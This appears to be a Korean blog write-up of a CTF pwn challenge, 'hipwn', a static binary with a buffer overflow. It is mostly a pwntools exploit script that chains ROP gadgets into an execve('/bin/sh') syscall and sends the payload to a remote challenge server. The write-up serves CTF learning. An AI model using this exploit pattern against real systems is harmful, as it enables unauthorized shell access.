hipwn.zip
10.8 kB
bof 문제인데 static이길래, rop를 짤 때, binsh를 찾다가 0x604268에 나의 Input이 저장되는 것을 보고 binsh의 주소로 삼고 srop를 했다.
Exploit Code
from pwn import *
#p=process('./chall')
p=remote('18.179.178.246', 9010)
binsh = 0x604268
pop_rdi = 0x40141c
pop_rsi_r15 = 0x40141a
pop_rdx = 0x4023f5
pop_rax = 0x400121
syscall = 0x4003fc
payload = '/bin/sh\x00'+'A'*0x100
payload += p64(pop_rdi)+p64(binsh)
payload += p64(pop_rsi_r15)+p64(0)+p64(0)
payload += p64(pop_rdx)+p64(0)
payload += p64(pop_rax)+p64(59)
payload += p64(syscall)
p.sendline(payload)
p.interactive()### Capture the Flag
'Writeup [pwn] > CTF 대회 기출' 카테고리의 다른 글
| [zer0pts CTF 2020] protrude (0) | 2020.03.15 |
|---|---|
| [zer0pts CTF 2020] diylist (0) | 2020.03.12 |
| DEFCON 2019 Speedrun-007 (0) | 2020.03.07 |
| DEFCON 2019 Speedrun-006 (0) | 2020.03.07 |
| DEFCON 2019 Speedrun-005 (0) | 2020.03.07 |